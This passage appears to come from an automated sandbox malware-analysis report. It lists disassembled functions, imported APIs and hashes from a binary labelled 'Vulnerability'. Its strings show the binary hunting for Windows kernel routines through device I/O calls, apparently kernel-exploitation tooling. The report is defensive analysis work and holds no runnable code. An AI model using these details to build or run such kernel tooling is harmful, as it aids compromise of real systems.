                                                                                          • Instruction Fuzzy Hash: E741B7A1B0978181EE15BF16A4052B8EB55EB04BF4FE48632DEAD0B7D5DE3CE241C310
                                                                                          Function 00007FF7CC41A5E0 Relevance: 7.6, APIs: 5, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N@Z.MSVCP140 ref: 00007FF7CC41A635
                                                                                          • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7CC41A656
                                                                                          • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC41A6CA
                                                                                          • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7CC41A73F
                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A782
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@Vlocale@2@
                                                                                          • String ID:
                                                                                          • API String ID: 481934583-0
                                                                                          • Opcode ID: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                                                          • Instruction ID: 0585114079535a4d6cecf657918af4fede480825201e916c52bb564c8aba724c
                                                                                          • Opcode Fuzzy Hash: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
                                                                                          • Instruction Fuzzy Hash: 42516C23B09A8481DB10DF1AE59023DABA0EB84FA8F558131DE9E43764CF39D582C350
                                                                                          Function 00007FF7CC413F20 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$CleanupModule64Unload_invalid_parameter_noinfo_noreturn
                                                                                          • String ID:
                                                                                          • API String ID: 1118963909-0
                                                                                          • Opcode ID: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                                                          • Instruction ID: 077112d3f33bf0e9dc73a48b92df4ce9e6bdc91964d0d39db48bbf1de73ad86e
                                                                                          • Opcode Fuzzy Hash: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
                                                                                          • Instruction Fuzzy Hash: ED2181A2A046C581EB14EF25D45937C6B72EB44FACF908031DA4E0A69ACF7DD9C4C350
                                                                                          Function 00007FF7CC420050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,0492492492492493,00007FF7CC41F8F6,?,?,00000000,00000000,?,00000000), ref: 00007FF7CC4200F9
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC4201A9
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID: gfffffff$gfffffff
                                                                                          • API String ID: 1934640635-161084747
                                                                                          • Opcode ID: 847be13be7db8cf1300a634f0f0caf657fd70b10d2ef20c64bbff5525a990887
                                                                                          • Instruction ID: 583a652507f4f4c677126071b7f93033e2ca3157372da43b7eece64a40dbd1fd
                                                                                          • Opcode Fuzzy Hash: 847be13be7db8cf1300a634f0f0caf657fd70b10d2ef20c64bbff5525a990887
                                                                                          • Instruction Fuzzy Hash: 7E51C472605B8581EE14EF13F441279E7A5EB48BD8F948232DA8D87B95DF3CD192C311
                                                                                          Function 00007FF7CC4170E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC417204
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417256
                                                                                            • Part of subcall function 00007FF7CC41C580: GetModuleHandleA.KERNEL32 ref: 00007FF7CC41C5D0
                                                                                            • Part of subcall function 00007FF7CC41C580: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41C5F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$HandleModule_invalid_parameter_noinfo_noreturn
                                                                                          • String ID: RtlLookupElementGenericTableAvl$[!] Failed to find RtlLookupElementGenericTableAvl
                                                                                          • API String ID: 1378083526-1952825546
                                                                                          • Opcode ID: cca0c0844387f2d15681cad13ec7d8960616ed310815bd53d65b1107346a9e7b
                                                                                          • Instruction ID: 5a66c926438686ebd658ef84fb759a576ff19a8aa83df992d5ffed683f6427ae
                                                                                          • Opcode Fuzzy Hash: cca0c0844387f2d15681cad13ec7d8960616ed310815bd53d65b1107346a9e7b
                                                                                          • Instruction Fuzzy Hash: 34418562E18BC681E650EF25E441379EB61FBC47F8FA09235E69D426A5DF3CD281C710
                                                                                          Function 00007FF7CC416E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F90
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC416F50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: ExAcquireResourceExclusiveLite$[!] Failed to find ExAcquireResourceExclusiveLite
                                                                                          • API String ID: 4162525100-2131800721
                                                                                          • Opcode ID: ec0f3fe029cf7c9f33ae343079c5c42bfb77fe7d126f801541ca4cd5903061d2
                                                                                          • Instruction ID: b90cca032eff3f27cfdea7894a7e36905e71ab77d1ecc8e32440af39fba9e2c3
                                                                                          • Opcode Fuzzy Hash: ec0f3fe029cf7c9f33ae343079c5c42bfb77fe7d126f801541ca4cd5903061d2
                                                                                          • Instruction Fuzzy Hash: 1E3183A1E18AC651FA00EF24E4413B5EB61EF957B8FD0D131E55D426E5DE2CE6C1C720
                                                                                          Function 00007FF7CC4160D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4161CE
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC41618E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: MmUnmapLockedPages$[!] Failed to find MmUnmapLockedPages
                                                                                          • API String ID: 4162525100-2848997145
                                                                                          • Opcode ID: 5957dede2b94ffe6d6d190a53612df9ae534eee6e8a7d16cd070dc35db71c8f9
                                                                                          • Instruction ID: a51711faa31b62103e937e55f65331d849598d0211608adaf373674ceea21209
                                                                                          • Opcode Fuzzy Hash: 5957dede2b94ffe6d6d190a53612df9ae534eee6e8a7d16cd070dc35db71c8f9
                                                                                          • Instruction Fuzzy Hash: 4C317662E18AC641EA00EF25E4412B9E761FFC57F8FD0D231E59D026A6DE2CE685C710
                                                                                          Function 00007FF7CC416320 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC416422
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4163E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: ExFreePool$[!] Failed to find ExAllocatePool
                                                                                          • API String ID: 4162525100-3091510598
                                                                                          • Opcode ID: 2725559fb159c936bb926d091b9f3f1744b5b68ea279b61c567f4bb089d1663f
                                                                                          • Instruction ID: 3a2d132e508b6a33020ec60275431758fefe7c0f133f600f95f77e9f6b1c5ea8
                                                                                          • Opcode Fuzzy Hash: 2725559fb159c936bb926d091b9f3f1744b5b68ea279b61c567f4bb089d1663f
                                                                                          • Instruction Fuzzy Hash: 2A21A4A2E186C681E910EF15E4411B89B61FF857F8FD0D235D99D426E5DF2CE781C320
                                                                                          Function 00007FF7CC416200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC4162F7
                                                                                            • Part of subcall function 00007FF7CC424090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7CC416ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7CC4174F3), ref: 00007FF7CC4240A0
                                                                                            • Part of subcall function 00007FF7CC41C9F0: memmove.VCRUNTIME140 ref: 00007FF7CC41CA28
                                                                                            • Part of subcall function 00007FF7CC416440: memset.VCRUNTIME140 ref: 00007FF7CC416491
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC416510
                                                                                            • Part of subcall function 00007FF7CC416440: DeviceIoControl.KERNEL32 ref: 00007FF7CC4165B0
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7CC4162B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
                                                                                          • String ID: MmFreePagesFromMdl$[!] Failed to find MmFreePagesFromMdl
                                                                                          • API String ID: 4162525100-1029121595
                                                                                          • Opcode ID: fa1bedc95faaa97df07f08ef03e503c10e7a9ee885c7fc475780664ac9344abc
                                                                                          • Instruction ID: 17106510d99ee2b98890dd3341e84e9a70c1d199849c27dd4a6bb99c99f45c79
                                                                                          • Opcode Fuzzy Hash: fa1bedc95faaa97df07f08ef03e503c10e7a9ee885c7fc475780664ac9344abc
                                                                                          • Instruction Fuzzy Hash: BE218461E18AC641EA00FF25E8412B5AB61FF857F8FD09231D59D426E5DF2CE285C620
                                                                                          Function 00007FF7CC415FE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF7CC417B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC417B4D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A43A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7CC41A45A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7CC41A46A
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7CC41A54D
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7CC41A554
                                                                                            • Part of subcall function 00007FF7CC41A3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7CC41A561
                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7CC41606C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                                                          • String ID: PAGE$[!] Failed to find MmFreeIndependentPages$xxxxxxxxx????xxxxxxx
                                                                                          • API String ID: 310790477-3730907401
                                                                                          • Opcode ID: 7c3e515ba8e34546da29bc7205f4d0ecbc687ab8c70488897c40de058f702fc7
                                                                                          • Instruction ID: 8539d8dbea4d10b0018f83ed20f044680f5daff1aabb208aa11dbd3f59cb836a
                                                                                          • Opcode Fuzzy Hash: 7c3e515ba8e34546da29bc7205f4d0ecbc687ab8c70488897c40de058f702fc7
                                                                                          • Instruction Fuzzy Hash: 79210E71A18B8291EA10EF14F4413A5ABA1FB857ACF948435EA8C07656DF3DE685C720
                                                                                          Function 00007FF7CC420F70 Relevance: 6.2, APIs: 4, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2138705365-0
                                                                                          • Opcode ID: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                                                          • Instruction ID: d6ba4173ed278d2ec27bb0d2b533473a01403a96be6a7688d888bff66f7cc027
                                                                                          • Opcode Fuzzy Hash: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
                                                                                          • Instruction Fuzzy Hash: D7819E72A04AC191EB04EF29E4853ACA775EB44F9CF908032DA4D47A69EF79DAD4C340
                                                                                          Function 00007FF7CC41F480 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F604
                                                                                            • Part of subcall function 00007FF7CC41CD60: memmove.VCRUNTIME140 ref: 00007FF7CC41CE27
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F749
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F750
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7CC41F757
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                                                                          • String ID:
                                                                                          • API String ID: 15630516-0
                                                                                          • Opcode ID: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
                                                                                          • Instruction ID: 79fbecdeaf240a95ade82e67a6ce73c90ecc302f30fcae48a479b557f5330c09
                                                                                          • Opcode Fuzzy Hash: fd1325f0e36d76d785edad516bb4fe04b7faf966728c9a8081332ed6b559d85a
                                                                                          • Instruction Fuzzy Hash: A8918162F04A818AFB10EFA4D4403AC7772EB457BCF918635DE6C16A99DF38D652C350
                                                                                          Function 00007FF7CC41F9D0 Relevance: 6.2, APIs: 4, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FB34
                                                                                            • Part of subcall function 00007FF7CC424108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7CC41CF43,?,?,?,?,?,0000000100000000,00007FF7CC4199B2), ref: 00007FF7CC424122
                                                                                          • memmove.VCRUNTIME140(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FB21
                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,?,?,00007FF7CC41F41B), ref: 00007FF7CC41FBCE
                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7CC41FBDB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1881379943.00007FF7CC411000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7CC410000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1881365101.00007FF7CC410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881416096.00007FF7CC433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1881430951.00007FF7CC434000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff7cc410000_Vulnerability.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                          • String ID:
                                                                                          • API String ID: 2075926362-0
                                                                                          • Opcode ID: 9ed46b6f8f75cd7a11fab145833413d8715b3bb7ca78f2fa700ff5e348dbe209
                                                                                          • Instruction ID: 44abee52b2c9d8455aeea28149c9efaf566220e67c2a1fa75fc01fd5ae0dcbc4
